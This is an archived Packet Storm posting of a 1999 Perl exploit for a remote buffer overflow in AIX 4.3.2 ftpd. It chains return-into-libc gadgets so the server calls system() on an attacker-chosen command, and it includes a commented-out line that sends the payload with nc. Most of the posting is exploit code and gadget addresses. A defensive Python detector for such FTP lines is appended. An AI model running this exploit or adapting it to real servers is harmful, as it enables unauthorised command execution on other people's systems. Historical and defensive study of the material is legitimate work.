AIX_ftpd_bof_exploit.txt

04 Oct 1999 | Reported by Packet Storm | Source: packetstormsecurity.com

Remote buffer overflow exploit for ftpd on AIX 4.3.2 running on an RS6000, crafted for one specific system.

Code
`One of our crewmembers wrote this exploit for the Hack-me project during HIT2000.  
I searched on securityfocus and saw it was still not mailed over here.  
IBM has been mailed, but due to lack of RS6000 knowledge they didn't get it working.....  
  
#!/usr/bin/perl  
# *** Synnergy Networks  
  
# * Description:  
#  
# Remote buffer overflow exploit for ftpd from AIX 4.3.2 running on an  
# RS6000. (power)  
# This is a return-into-libc exploit specifically crafted for  
# one box and it is very unlikely to work on another box  
  
# * Author:  
#  
# dvorak ([email protected])  
# Synnergy Networks (c) 1999, http://www.synnergy.net  
  
# * Greets:  
#  
# Synnergy Networks, Hit2000 crew, Emphyrio, shevek  
  
# * Comments:  
#  
# A full working exploit will be released later on.  
# The addresses point to positions in the program or libraries,  
# only the relevant instructions are shown also note that b r0  
# is in fact something like mfsbr r0, bsbr or what that is in  
# RS6000 assembly.  
#  
# The final call is to system which needs the following arguments:  
# r3 = address of command to execute  
# r2 = TOC (what is TOC anyway), I don't know if it does matter but  
# we set it anyway (we can so why not do it)  
# r1 = SP but this is ok already,  
# the rest is free so it seems.  
#  
# Our route:  
# 0x10010150: sets r2 to a place in the buffer and jumps to 0x10015228  
# 0x10015228: loads r12 with a value from our buffer  
# loads r0 with the next address to jump to (0x1001038c)  
# and sets r2 to another place in our buffer  
# 0x1001038c: sets r3 to a place in the buffer (finally!)  
# sets r0 to next address to jump to (0xd00406d4, system(...))  
#  
# The flow with registers is thus:  
# r2 = 0x14(r1)  
# r12 = 0x110(r2)  
# r0 = 0x0(r12)  
# r2 = 0x4(r12)  
# r3 = 0x40(r1)  
# r12 = 0x3c(r2)  
# 0x14(r1) = r12 this is the place where TOC is stored but it doesn't seem  
# to matter  
# r0 = 0x0(r12)  
# r2 = 0x04(r12)  
# and off we go...  
#  
# We set:  
# $buf = the buffer on the stack $buf[0] is the first byte in the buffer  
# but we will count offsets from 4 (the first 4 bytes are just "CEL "; it  
# doesn't matter, only the space does: it makes sure the rest of the buffer  
# stays the way it is and isn't converted into lower case)  
#  
# Offsets:  
# 0x000: 0x1001038c  
# 0x004: buf[0]  
# 0x008: this is the place where the address of the systemcall is taken from  
# 0xd00406d4 in our case  
# 0x00c: this is the address where r2 is loaded from just before the call to  
# system(..) we set it to the TOC in our program we don't know if it  
# matters and if the TOC is constant between hosts  
# 0x03c: buf[08]  
# 0x110: buf[0]  
# 0x204: return address (0x10010150)  
# 0x210: buf[0]  
# 0x23c: buf[0x240]  
# 0x240: "/tmp/sh" or whatever command you want to execute  
# r1 points to buf[0x1fc]  
#  
# I assume the positions in the libraries/program are fixed and that TOC  
# either doesn't matter or is fixed to please enlighten me on these topics.  
#  
# 0x10010150:  
# l r2, 0x14(r1)  
# b 0x10015228  
# 0x10015228:  
# l r12, 0x110(r2)  
# st r12, 0x14(r1)  
# l r0, 0x0(r12)  
# l r2, 0x4(r12)  
# b r0  
# 0x1001038c:  
# l r3, 0x40(r1)  
# b 0x100136f8  
# 0x100136f8:  
# l r12, 0x3c(r2)  
# st r12, 0x14(r1)  
# l r0, 0x0(r12)  
# l r2, 0x04(r12)  
  
# *** Synnergy Networks  
  
$bufstart = 0x2ff22724; # this is our first guess  
$nop = "\xde\xad\xca\xfe";  
$buf = "CEL ";  
$buf .= "\x10\x01\x03\x8c"; # 0 address of second piece of  
# 'borrowed' code  
$buf .= pack ("N", $bufstart); # 4  
$buf .= "\xd0\x04\x06\xd4"; # 8 system call..  
$buf .= "\xf0\x14\x63\x5c"; # c TOC  
$offset = 0x10;  
while ($offset < 0x3c) {  
$offset += 4;  
$buf .= $nop;  
}  
$buf .= pack ("N", $bufstart + 0x008);  
$offset += 4;  
while ($offset < 0x110) {  
$offset += 4;  
$buf .= $nop;  
}  
$buf .= pack ("N", $bufstart);  
$offset += 4;  
while ($offset < 0x204) {  
$offset += 4;  
$buf .= $nop;  
}  
$buf .= "\x10\x01\x01\x50";  
$offset += 4;  
while ($offset < 0x210) {  
$offset += 4;  
$buf .= $nop;  
}  
$buf .= pack ("N", $bufstart);  
$offset += 4;  
while ($offset < 0x23c) {  
$offset += 4;  
$buf .= $nop;  
}  
$buf .= pack ("N", $bufstart + 0x240);  
$offset += 4;  
while ($offset < 0x240) {  
$offset += 4;  
$buf .= $nop;  
}  
# this is the command that will be run through system  
$buf .= "/tmp/sh";  
$buf .= "\n";  
  
# of course you should change this.  
# open F, "| nc -v -v -n 192.168.2.12 21";  
open F, "| od -tx1";  
printf F $buf;  
close F;  
  
# EOF  
  
gtx,  
Gerrie  
My answers & statements are entirely my own responsibility.  
tel. 06-24119524  
Fun & Secure  
http://www.hit2000.org  
Join our RC5 Team!  
`
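
A defender-side check for the request described in the posting above, as an added example that is not part of the original posting or the author's code: it flags FTP control-channel lines with an unrecognised verb, a length that reaches the overwritten return address, or non-printable bytes. The verb list, the 512-byte limit, the function names and the sample session are assumptions made for illustration.

```python
# Added example: flags FTP control-channel lines shaped like the request above.
# Verb list: RFC 959 plus common extensions; extend it for your own servers.
KNOWN_VERBS = set("""USER PASS ACCT CWD CDUP SMNT QUIT REIN PORT PASV TYPE STRU
MODE RETR STOR STOU APPE ALLO REST RNFR RNTO ABOR DELE RMD MKD PWD LIST NLST
SITE SYST STAT HELP NOOP FEAT OPTS SIZE MDTM EPSV EPRT AUTH PBSZ PROT""".split())

# Assumed policy limit. The posting puts the return address 0x204 bytes after
# the 4-byte verb (byte 520 of the line), so a line reaching it exceeds this.
MAX_LINE = 512

def inspect_ftp_line(line: bytes) -> list:
    """Return the reasons a single control-channel line looks anomalous."""
    body = line.rstrip(b"\r\n")
    findings = []
    verb = body.split(b" ", 1)[0].decode("latin-1").upper()
    if verb not in KNOWN_VERBS:
        findings.append("unknown-verb")
    if len(body) > MAX_LINE:
        findings.append("overlong")
    # Commands are printable ASCII; packed addresses are not.
    if any(b < 0x20 or b > 0x7E for b in body):
        findings.append("binary-bytes")
    return findings

def scan(lines):
    """Return (index, findings) for every flagged line of a captured session."""
    hits = []
    for i, line in enumerate(lines):
        findings = inspect_ftp_line(line)
        if findings:
            hits.append((i, findings))
    return hits

# Constructed session: two ordinary commands, then a line with the posting's
# verb and length but inert filler bytes only (no addresses, no command).
SAMPLE = [
    b"USER anonymous\r\n",
    b"PASS guest@example.org\r\n",
    b"CEL " + b"\xde\xad\xca\xfe" * 0x92 + b"\n",
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE):
        print(index, len(SAMPLE[index]), ",".join(findings))
```

A legitimate client's Telnet IAC sequence ahead of ABOR also trips the verb and binary checks, so weight the overlong finding most.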
